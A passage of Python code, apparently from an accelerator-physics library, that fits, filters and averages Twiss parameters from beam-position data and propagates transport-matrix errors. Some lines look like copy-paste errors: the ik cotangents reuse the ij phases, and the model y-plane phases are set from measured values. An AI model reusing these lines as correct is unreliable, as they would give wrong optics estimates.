self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik'] = fx_ik.T, sx_ik.T, fx_m_ik.T, sx_m_ik.T
self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij'] = fy_ij.T, sy_ij.T, fy_ij.T, sy_m_ij.T
self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik'] = fy_ik.T, sy_ik.T, fy_ik.T, sy_m_ik.T
self.data_phase['ax'], self.data_phase['sigma_ax'], self.data_phase['bx'], self.data_phase['sigma_bx'] = ax.T, sigma_ax.T, bx.T, sigma_bx.T
self.data_phase['ay'], self.data_phase['sigma_ay'], self.data_phase['by'], self.data_phase['sigma_by'] = ay.T, sigma_ay.T, by.T, sigma_by.T
def filter_twiss(self, plane:str = 'x', *,
phase:dict={'use': True, 'threshold': 10.00},
model:dict={'use': True, 'threshold': 00.50},
value:dict={'use': True, 'threshold': 00.50},
sigma:dict={'use': True, 'threshold': 00.25},
limit:dict={'use': True, 'threshold': 05.00}) -> dict:
"""
Filter twiss for given data plane and cleaning options.
Parameters
----------
plane: str
data plane ('x' or 'y')
phase: dict
clean based on advance phase data
used if 'use' is True, remove combinations with absolute value of phase advance cotangents above threshold value
model: dict
clean based on phase advance proximity to model
used if 'use' is True, remove combinations with (x - x_model)/x_model > threshold value
value: dict
clean based on estimated twiss beta error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
sigma: dict
clean based on estimated phase advance error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
limit: dict
clean outliers outside scaled interval
used if 'use' is True
Returns
-------
mask (torch.Tensor)
"""
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a_m, b_m = self.model.ax.reshape(-1, 1), self.model.bx.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ax'], self.data_phase['bx'], self.data_phase['sigma_ax'], self.data_phase['sigma_bx']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik']
if plane == 'y':
a_m, b_m = self.model.ay.reshape(-1, 1), self.model.by.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ay'], self.data_phase['by'], self.data_phase['sigma_ay'], self.data_phase['sigma_by']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik']
if phase['use']:
cot_ij, cot_m_ij = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
cot_ik, cot_m_ik = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
mask *= phase['threshold'] > cot_ij
mask *= phase['threshold'] > cot_m_ij
mask *= phase['threshold'] > cot_ik
mask *= phase['threshold'] > cot_m_ik
if model['use']:
mask *= model['threshold'] > torch.abs((f_ij - f_m_ij)/f_m_ij)
mask *= model['threshold'] > torch.abs((f_ik - f_m_ik)/f_m_ik)
if value['use']:
mask *= value['threshold'] > torch.abs((b - b_m)/b_m)
if sigma['use']:
mask *= 1/sigma['threshold'] < torch.abs(f_ij/sigma_f_ij)
mask *= 1/sigma['threshold'] < torch.abs(f_ik/sigma_f_ik)
if limit['use']:
factor = torch.tensor(limit['threshold'], dtype=self.dtype, device=self.device)
mask *= threshold(standardize(a, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
mask *= threshold(standardize(b, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
return mask
def mask_range(self, limit:tuple) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
limit: tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
Returns
-------
weight mask (torch.Tensor)
"""
size, length, *_ = self.shape
mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
limit_min, limit_max = limit
if limit_min == limit_max:
count = count[:limit_max]
*_, count_max = count
mask[:, :count_max] = 1
if limit_min < limit_max:
count = count[limit_min - 1:limit_max]
count_min, *_, count_max = count
mask[:, count_min:count_max] = 1
count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
limit_min, limit_max = self.limit
if limit_min == limit_max:
count = count[:limit_max]
*_, count_max = count
mask = mask[:, :count_max]
if limit_min < limit_max:
count = count[limit_min - 1:limit_max]
count_min, *_, count_max = count
mask = mask[:, count_min:count_max]
return mask
def mask_location(self, table:list) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
table: list
list of locations to remove
Returns
-------
weight mask (torch.Tensor)
"""
size, length, *_ = self.combo.shape
mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
for location in table:
_, other = self.index.swapaxes(0, -1)
other = torch.mul(*(other != location).swapaxes(0, 1)).T
mask = (mask == other)
return mask.logical_not()
def mask_distance(self, function) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
function: Callable
function to apply to distance data
Returns
-------
weight mask (torch.Tensor)
"""
mask = torch.stack([function(distance) for distance in self.distance])
mask = torch.stack([mask for _ in range(self.size)])
return mask
def process_twiss(self, plane:str='x', *,
weight:bool=True, mask:torch.Tensor=None) -> dict:
"""
Process twiss data.
Parameters
----------
plane: str
data plane ('x' or 'y')
weight: bool
flag to use weights
mask: torch.Tensor
mask
Returns
-------
twiss data (dict)
dict_keys(['value_a', 'sigma_a', 'error_a', 'value_b', 'sigma_b', 'error_b'])
"""
result = {}
if mask == None:
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a, sigma_a, a_m = self.data_phase['ax'], self.data_phase['sigma_ax'], self.model.ax
b, sigma_b, b_m = self.data_phase['bx'], self.data_phase['sigma_bx'], self.model.bx
if plane == 'y':
a, sigma_a, a_m = self.data_phase['ay'], self.data_phase['sigma_ay'], self.model.ay
b, sigma_b, b_m = self.data_phase['by'], self.data_phase['sigma_by'], self.model.by
if not weight:
center = weighted_mean(a, weight=mask)
spread = weighted_variance(a, weight=mask, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
center = weighted_mean(b, weight=mask)
spread = weighted_variance(b, weight=mask, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
return result
weight = (mask.to(self.dtype)/sigma_a**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(a, weight=weight)
spread = weighted_variance(a, weight=weight, center=center).sqrt()
result['value_a'] = center
result['sigma_a'] = spread
result['error_a'] = (center - a_m)/a_m
weight = (mask.to(self.dtype)/sigma_b**2).nan_to_num(posinf=0.0, neginf=0.0)
center = weighted_mean(b, weight=weight)
spread = weighted_variance(b, weight=weight, center=center).sqrt()
result['value_b'] = center
result['sigma_b'] = spread
result['error_b'] = (center - b_m)/b_m
if plane == 'x':
self.ax, self.sigma_ax = result['value_a'], result['sigma_a']
self.bx, self.sigma_bx = result['value_b'], result['sigma_b']
if plane == 'y':
self.ay, self.sigma_ay = result['value_a'], result['sigma_a']
self.by, self.sigma_by = result['value_b'], result['sigma_b']
return result
def get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *,
refit:bool=False, factor:float=5.0,
level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None,
ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None,
transport:torch.Tensor=None, **kwargs) -> dict:
"""
Estimate twiss from tbt data using ODR fit.
Note, if no initial guesses for twiss and/or transport are given, model values will be used
This method is sensitive to noise and calibration errors
Parameters
----------
n: int
number of turns to use
x: torch.Tensor
x data
y: torch.Tensor
y data
refit: bool
flag to refit twiss using estimated invariants
factor: float
threshold factor for invariants spread
level: float
default noise level
sigma_x: torch.Tensor
x noise sigma for each signal
sigma_y: torch.Tensor
y noise sigma for each signal
ax, bx, ay, by: torch.Tensor
initial guess for twiss parameters at monitor locations
transport: torch.Tensor
transport matrices between monitor locations
Returns
-------
fit result (dict)
dict_keys(['jx', 'ax', 'bx', 'sigma_jx', 'sigma_ax', 'sigma_bx', 'jy', 'ay', 'by', 'sigma_jy', 'sigma_ay', 'sigma_by', 'mux', 'muy'])
"""
if ax is None:
ax = self.model.ax[self.model.monitor_index].cpu().numpy()
else:
ax = ax.cpu().numpy()
if bx is None:
bx = self.model.bx[self.model.monitor_index].cpu().numpy()
else:
bx = bx.cpu().numpy()
if ay is None:
ay = self.model.ay[self.model.monitor_index].cpu().numpy()
else:
ay = ay.cpu().numpy()
if by is None:
by = self.model.by[self.model.monitor_index].cpu().numpy()
else:
by = by.cpu().numpy()
if transport is None:
probe = torch.tensor(self.model.monitor_index, dtype=torch.int64, device=self.device)
other = torch.roll(probe, -1)
other[-1] += self.model.size
transport = self.model.matrix(probe, other)
copy = torch.clone(transport)
def ellipse(w, x):
alpha, beta, action = w
q1, q2, m11, m12 = x
return 1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2) - action
value_jx, error_jx = [], []
value_jy, error_jy = [], []
value_ax, error_ax = [], []
value_ay, error_ay = [], []
value_bx, error_bx = [], []
value_by, error_by = [], []
for i in range(self.model.monitor_count):
q1 = x[i, :n].cpu().numpy()
q2 = x[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
if i + 1 == self.model.monitor_count:
q2 = x[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
if sigma_x is not None:
s1, s2 = sigma_x[i].cpu().numpy(), sigma_x[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
else:
s1, s2 = level, level
m11 = transport[i, 0, 0].cpu().numpy()
m12 = transport[i, 0, 1].cpu().numpy()
alpha, beta = ax[i], bx[i]
action = numpy.median(1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2))
m11 = m11*numpy.ones(n)
m12 = m12*numpy.ones(n)
X = numpy.array([q1, q2, m11, m12])
data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
model = odr.Model(ellipse, implicit=True)
fit = odr.ODR(data, model, beta0=[alpha, beta, action], **kwargs).run()
alpha, beta, action = fit.beta
sigma_alpha, sigma_beta, sigma_action = fit.sd_beta
value_jx.append(action)
value_ax.append(alpha)
value_bx.append(beta)
error_jx.append(sigma_action)
error_ax.append(sigma_alpha)
error_bx.append(sigma_beta)
q1 = y[i, :n].cpu().numpy()
q2 = y[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
if i + 1 == self.model.monitor_count:
q2 = y[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
if sigma_y is not None:
s1, s2 = sigma_y[i].cpu().numpy(), sigma_y[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
else:
s1, s2 = level, level
m11 = transport[i, 2, 2].cpu().numpy()
m12 = transport[i, 2, 3].cpu().numpy()
alpha, beta = ay[i], by[i]
action = numpy.median(1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2))
m11 = m11*numpy.ones(n)
m12 = m12*numpy.ones(n)
X = numpy.array([q1, q2, m11, m12])
data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
model = odr.Model(ellipse, implicit=True)
fit = odr.ODR(data, model, beta0=[alpha, beta, action], **kwargs).run()
alpha, beta, action = fit.beta
sigma_alpha, sigma_beta, sigma_action = fit.sd_beta
value_jy.append(action)
value_ay.append(alpha)
value_by.append(beta)
error_jy.append(sigma_action)
error_ay.append(sigma_alpha)
error_by.append(sigma_beta)
result = {}
result['center_jx'] = None
result['spread_jx'] = None
result['center_jy'] = None
result['spread_jy'] = None
result['jx'] = 0.5*torch.tensor(value_jx, dtype=self.dtype, device=self.device)
result['ax'] = torch.tensor(value_ax, dtype=self.dtype, device=self.device)
result['bx'] = torch.tensor(value_bx, dtype=self.dtype, device=self.device)
result['sigma_jx'] = 0.5*torch.tensor(error_jx, dtype=self.dtype, device=self.device)
result['sigma_ax'] = torch.tensor(error_ax, dtype=self.dtype, device=self.device)
result['sigma_bx'] = torch.tensor(error_bx, dtype=self.dtype, device=self.device)
result['jy'] = 0.5*torch.tensor(value_jy, dtype=self.dtype, device=self.device)
result['ay'] = torch.tensor(value_ay, dtype=self.dtype, device=self.device)
result['by'] = torch.tensor(value_by, dtype=self.dtype, device=self.device)
result['sigma_jy'] = 0.5*torch.tensor(error_jy, dtype=self.dtype, device=self.device)
result['sigma_ay'] = torch.tensor(error_ay, dtype=self.dtype, device=self.device)
result['sigma_by'] = torch.tensor(error_by, dtype=self.dtype, device=self.device)
factor = torch.tensor(factor, dtype=self.dtype, device=self.device)
mask_jx = threshold(standardize(result['jx'], center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
mask_jx = mask_jx.squeeze()/(result['sigma_jx']/result['sigma_jx'].sum())**2
center_jx = weighted_mean(result['jx'], weight=mask_jx)
spread_jx = weighted_variance(result['jx'], weight=mask_jx, center=center_jx).sqrt()
mask_jy = threshold(standardize(result['jy'], center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
mask_jy = mask_jy.squeeze()/(result['sigma_jy']/result['sigma_jy'].sum())**2
center_jy = weighted_mean(result['jy'], weight=mask_jy)
spread_jy = weighted_variance(result['jy'], weight=mask_jy, center=center_jy).sqrt()
result['center_jx'] = center_jx
result['spread_jx'] = spread_jx
result['center_jy'] = center_jy
result['spread_jy'] = spread_jy
advance = []
for i in range(self.model.monitor_count):
normal = self.model.cs_normal(result['ax'][i], result['bx'][i], result['ay'][i], result['by'][i])
values, _ = self.model.advance_twiss(normal, transport[i])
advance.append(values)
advance = torch.stack(advance).T
result['mux'], result['muy'] = advance
if not refit:
return result
def ellipse(w, x):
alpha, beta = w
q1, q2, m11, m12 = x
return 1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2) - action
value_ax, error_ax = [], []
value_ay, error_ay = [], []
value_bx, error_bx = [], []
value_by, error_by = [], []
for i in range(self.model.monitor_count):
action = 2.0*center_jx.cpu().numpy()
q1 = x[i, :n].cpu().numpy()
q2 = x[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
if i + 1 == self.model.monitor_count:
q2 = x[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
if sigma_x is not None:
s1, s2 = sigma_x[i].cpu().numpy(), sigma_x[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
else:
s1, s2 = level, level
m11 = transport[i, 0, 0].cpu().numpy()
m12 = transport[i, 0, 1].cpu().numpy()
alpha, beta = result['ax'][i].cpu().numpy(), result['bx'][i].cpu().numpy()
m11 = m11*numpy.ones(n)
m12 = m12*numpy.ones(n)
X = numpy.array([q1, q2, m11, m12])
data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
model = odr.Model(ellipse, implicit=True)
fit = odr.ODR(data, model, beta0=[alpha, beta], **kwargs).run()
alpha, beta = fit.beta
sigma_alpha, sigma_beta = fit.sd_beta
value_ax.append(alpha)
value_bx.append(beta)
error_ax.append(sigma_alpha)
error_bx.append(sigma_beta)
action = 2.0*center_jy.cpu().numpy()
q1 = y[i, :n].cpu().numpy()
q2 = y[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
if i + 1 == self.model.monitor_count:
q2 = y[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
if sigma_y is not None:
s1, s2 = sigma_y[i].cpu().numpy(), sigma_y[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
else:
s1, s2 = level, level
m11 = transport[i, 2, 2].cpu().numpy()
m12 = transport[i, 2, 3].cpu().numpy()
alpha, beta = result['ay'][i].cpu().numpy(), result['by'][i].cpu().numpy()
m11 = m11*numpy.ones(n)
m12 = m12*numpy.ones(n)
X = numpy.array([q1, q2, m11, m12])
data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
model = odr.Model(ellipse, implicit=True)
fit = odr.ODR(data, model, beta0=[alpha, beta], **kwargs).run()
alpha, beta = fit.beta
sigma_alpha, sigma_beta = fit.sd_beta
value_ay.append(alpha)
value_by.append(beta)
error_ay.append(sigma_alpha)
error_by.append(sigma_beta)
result['ax'] = torch.tensor(value_ax, dtype=self.dtype, device=self.device)
result['bx'] = torch.tensor(value_bx, dtype=self.dtype, device=self.device)
result['sigma_ax'] = torch.tensor(error_ax, dtype=self.dtype, device=self.device)
result['sigma_bx'] = torch.tensor(error_bx, dtype=self.dtype, device=self.device)
result['ay'] = torch.tensor(value_ay, dtype=self.dtype, device=self.device)
result['by'] = torch.tensor(value_by, dtype=self.dtype, device=self.device)
result['sigma_ay'] = torch.tensor(error_ay, dtype=self.dtype, device=self.device)
result['sigma_by'] = torch.tensor(error_by, dtype=self.dtype, device=self.device)
advance = []
for i in range(self.model.monitor_count):
normal = self.model.cs_normal(result['ax'][i], result['bx'][i], result['ay'][i], result['by'][i])
values, _ = self.model.advance_twiss(normal, transport[i])
advance.append(values)
advance = torch.stack(advance).T
result['mux'], result['muy'] = advance
return result
def get_ax(self, index:int) -> torch.Tensor:
"""
Get ax value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[ax, sigma_ax] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_ax(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.ax[index], self.sigma_ax[index]])
def get_bx(self, index:int) -> torch.Tensor:
"""
Get bx value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[bx, sigma_bx] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_bx(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.bx[index], self.sigma_bx[index]])
def get_fx(self, index:int) -> torch.Tensor:
"""
Get fx value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[fx, sigma_fx] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_fx(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.fx[index], self.sigma_fx[index]])
def get_ay(self, index:int) -> torch.Tensor:
"""
Get ay value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[ay, sigma_ay] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_ay(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.ay[index], self.sigma_ay[index]])
def get_by(self, index:int) -> torch.Tensor:
"""
Get by value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[by, sigma_by] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_by(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.by[index], self.sigma_by[index]])
def get_fy(self, index:int) -> torch.Tensor:
"""
Get fy value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[fy, sigma_fy] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_fy(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.fy[index], self.sigma_fy[index]])
def get_twiss(self, index:int) -> dict:
"""
Return twiss data at given index.
Parameters
----------
index: int
index or location name
Returns
-------
twiss data (dict)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_twiss(self.model.get_index(index))
table = {}
table['ax'], table['sigma_ax'] = self.get_ax(index)
table['bx'], table['sigma_bx'] = self.get_bx(index)
table['fx'], table['sigma_fx'] = self.get_fx(index)
table['ay'], table['sigma_ay'] = self.get_ay(index)
table['by'], table['sigma_by'] = self.get_by(index)
table['fy'], table['sigma_fy'] = self.get_fy(index)
return table
def get_table(self) -> pandas.DataFrame:
"""
Return twiss data at all locations as dataframe.
Parameters
----------
None
Returns
-------
twiss data (pandas.DataFrame)
"""
df = pandas.DataFrame()
df['name'] = self.model.name
df['kind'] = self.model.kind
df['flag'] = self.flag.cpu().numpy()
df['time'] = self.model.time.cpu().numpy()
df['ax'], df['sigma_ax'] = self.ax.cpu().numpy(), self.sigma_ax.cpu().numpy()
df['bx'], df['sigma_bx'] = self.bx.cpu().numpy(), self.sigma_bx.cpu().numpy()
df['fx'], df['sigma_fx'] = self.fx.cpu().numpy(), self.sigma_fx.cpu().numpy()
df['ay'], df['sigma_ay'] = self.ay.cpu().numpy(), self.sigma_ay.cpu().numpy()
df['by'], df['sigma_by'] = self.by.cpu().numpy(), self.sigma_by.cpu().numpy()
df['fy'], df['sigma_fy'] = self.fy.cpu().numpy(), self.sigma_fy.cpu().numpy()
return df
def __repr__(self) -> str:
"""
String representation.
"""
return f'{self.__class__.__name__}({self.model}, {self.table}, {self.limit})'
def __len__(self) -> int:
"""
Number of locations.
"""
return self.size
def __call__(self, limit:int=None) -> pandas.DataFrame:
"""
Perform twiss loop with default parameters.
Parameters
----------
limit: int
range limit for virtual phase computation
Returns
-------
twiss table (pandas.DataFrame)
"""
limit = max(self.limit) if limit is None else limit
self.get_action()
self.get_twiss_from_amplitude()
self.phase_virtual(limit=limit)
self.get_twiss_from_phase()
select = {
'phase': {'use': True, 'threshold': 10.00},
'model': {'use': False, 'threshold': 00.50},
'value': {'use': False, 'threshold': 00.50},
'sigma': {'use': False, 'threshold': 00.25},
'limit': {'use': True, 'threshold': 05.00}
}
mask_x = self.filter_twiss(plane='x', **select)
mask_y = self.filter_twiss(plane='y', **select)
_ = self.process_twiss(plane='x', mask=mask_x, weight=True)
_ = self.process_twiss(plane='y', mask=mask_y, weight=True)
return self.get_table()
def matrix(self, probe:torch.Tensor, other:torch.Tensor) -> tuple:
"""
Generate uncoupled transport matrix (or matrices) for given locations.
Matrices are generated from probe to other
One-turn matrices are generated where probe == other
Input parameters should be 1D tensors with matching length
Additionaly probe and/or other input parameter can be an int or str in self.model.name (not checked)
Note, twiss parameters are treated as independent variables in error propagation
Parameters
----------
probe: torch.Tensor
probe locations
other: torch.Tensor
other locations
Returns
-------
uncoupled transport matrices and error matrices(tuple)
"""
if isinstance(probe, int):
probe = torch.tensor([probe], dtype=torch.int64, device=self.device)
if isinstance(probe, str):
probe = torch.tensor([self.model.name.index(probe)], dtype=torch.int64, device=self.device)
if isinstance(other, int):
other = torch.tensor([other], dtype=torch.int64, device=self.device)
if isinstance(other, str):
other = torch.tensor([self.model.name.index(other)], dtype=torch.int64, device=self.device)
other[probe == other] += self.size
fx, sigma_fx = Decomposition.phase_advance(probe, other, self.table.nux, self.fx, error=True, sigma_frequency=self.table.sigma_nux, sigma_phase=self.sigma_fx)
fy, sigma_fy = Decomposition.phase_advance(probe, other, self.table.nuy, self.fy, error=True, sigma_frequency=self.table.sigma_nuy, sigma_phase=self.sigma_fy)
probe = mod(probe, self.size).to(torch.int64)
other = mod(other, self.size).to(torch.int64)
transport = self.model.matrix_uncoupled(self.ax[probe], self.bx[probe], self.ax[other], self.bx[other], fx, self.ay[probe], self.by[probe], self.ay[other], self.by[other], fy)
sigma_transport = torch.zeros_like(transport)
sigma_transport[:, 0, 0] += self.sigma_ax[probe]**2*self.bx[other]*torch.sin(fx)**2/self.bx[probe]
sigma_transport[:, 0, 0] += self.sigma_bx[probe]**2*self.bx[other]*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(4.0*self.bx[probe]**3)
sigma_transport[:, 0, 0] += self.sigma_bx[other]**2*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other])
sigma_transport[:, 0, 0] += sigma_fx**2*self.bx[other]*(-self.ax[probe]*torch.cos(fx) + torch.sin(fx))**2/self.bx[probe]
sigma_transport[:, 0, 1] += self.sigma_bx[probe]**2*self.bx[other]*torch.sin(fx)**2/(4.0*self.bx[probe])
sigma_transport[:, 0, 1] += self.sigma_bx[other]**2*self.bx[probe]*torch.sin(fx)**2/(4.0*self.bx[other])
sigma_transport[:, 0, 1] += sigma_fx**2*self.bx[probe]*self.bx[other]*torch.cos(fx)**2
sigma_transport[:, 1, 0] += self.sigma_ax[probe]**2*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
sigma_transport[:, 1, 0] += self.sigma_ax[other]**2*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
sigma_transport[:, 1, 0] += self.sigma_bx[probe]**2*((-self.ax[probe] + self.ax[other])*torch.cos(fx) + (1.0 + self.ax[probe]*self.ax[other])*torch.sin(fx))**2/(4.0*self.bx[probe]**3*self.bx[other])
sigma_transport[:, 1, 0] += self.sigma_bx[other]**2*((-self.ax[probe] + self.ax[other])*torch.cos(fx) + (1.0 + self.ax[probe]*self.ax[other])*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other]**3)
sigma_transport[:, 1, 0] += sigma_fx**2*((1.0 + self.ax[probe]*self.ax[other])*torch.cos(fx) + (self.ax[probe] - self.ax[other])*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
sigma_transport[:, 1, 1] += self.sigma_bx[probe]**2*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other])
sigma_transport[:, 1, 1] += self.sigma_ax[other]**2*self.bx[probe]*torch.sin(fx)**2/self.bx[other]
sigma_transport[:, 1, 1] += self.sigma_bx[other]**2*self.bx[probe]*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(4.0*self.bx[other]**3)
sigma_transport[:, 1, 1] += sigma_fx**2*self.bx[probe]*(self.ax[other]*torch.cos(fx) + torch.sin(fx))**2/self.bx[other]
sigma_transport[:, 2, 2] += self.sigma_ay[probe]**2*self.by[other]*torch.sin(fy)**2/self.by[probe]
sigma_transport[:, 2, 2] += self.sigma_by[probe]**2*self.by[other]*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(4.0*self.by[probe]**3)
sigma_transport[:, 2, 2] += self.sigma_by[other]**2*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other])
sigma_transport[:, 2, 2] += sigma_fy**2*self.by[other]*(-self.ay[probe]*torch.cos(fy) + torch.sin(fy))**2/self.by[probe]
sigma_transport[:, 2, 3] += self.sigma_by[probe]**2*self.by[other]*torch.sin(fy)**2/(4.0*self.by[probe])
sigma_transport[:, 2, 3] += self.sigma_by[other]**2*self.by[probe]*torch.sin(fy)**2/(4.0*self.by[other])
sigma_transport[:, 2, 3] += sigma_fy**2*self.by[probe]*self.by[other]*torch.cos(fy)**2
sigma_transport[:, 3, 2] += self.sigma_ay[probe]**2*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(self.by[probe]*self.by[other])
sigma_transport[:, 3, 2] += self.sigma_ay[other]**2*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(self.by[probe]*self.by[other])
sigma_transport[:, 3, 2] += self.sigma_by[probe]**2*((-self.ay[probe] + self.ay[other])*torch.cos(fy) + (1.0 + self.ay[probe]*self.ay[other])*torch.sin(fy))**2/(4.0*self.by[probe]**3*self.by[other])
sigma_transport[:, 3, 2] += self.sigma_by[other]**2*((-self.ay[probe] + self.ay[other])*torch.cos(fy) + (1.0 + self.ay[probe]*self.ay[other])*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other]**3)
sigma_transport[:, 3, 2] += sigma_fy**2*((1.0 + self.ay[probe]*self.ay[other])*torch.cos(fy) + (self.ay[probe] - self.ay[other])*torch.sin(fy))**2/(self.by[probe]*self.by[other])
sigma_transport[:, 3, 3] += self.sigma_by[probe]**2*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other])
sigma_transport[:, 3, 3] += self.sigma_ay[other]**2*self.by[probe]*torch.sin(fy)**2/self.by[other]
sigma_transport[:, 3, 3] += self.sigma_by[other]**2*self.by[probe]*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(4.0*self.by[other]**3)
sigma_transport[:, 3, 3] += sigma_fy**2*self.by[probe]*(self.ay[other]*torch.cos(fy) + torch.sin(fy))**2/self.by[other]
sigma_transport.sqrt_()
return (transport.squeeze(), sigma_transport.squeeze())
def make_transport(self) -> None:
"""
Set transport matrices between adjacent locations.
self.transport[i] is a transport matrix from i to i + 1
Parameters
----------
None
Returns
-------
None
"""
probe = torch.arange(self.size, dtype=torch.int64, device=self.device)
other = 1 + probe
self.transport, _ = self.matrix(probe, other)
def matrix_transport(self, probe:int, other:int) -> torch.Tensor:
"""
Generate transport matrix from probe to other using self.transport.
Parameters
----------
probe: int
probe location
other: int
other location
Returns
-------
transport matrix (torch.Tensor)
"""
if isinstance(probe, str):
probe = self.name.index(probe)
if isinstance(other, str):
other = self.name.index(other)
if probe < other:
matrix = self.transport[probe]
for i in range(probe + 1, other):
matrix = self.transport[int(mod(i, self.size))] @ matrix
return matrix
if probe > other:
matrix = self.transport[other]
for i in range(other + 1, probe):
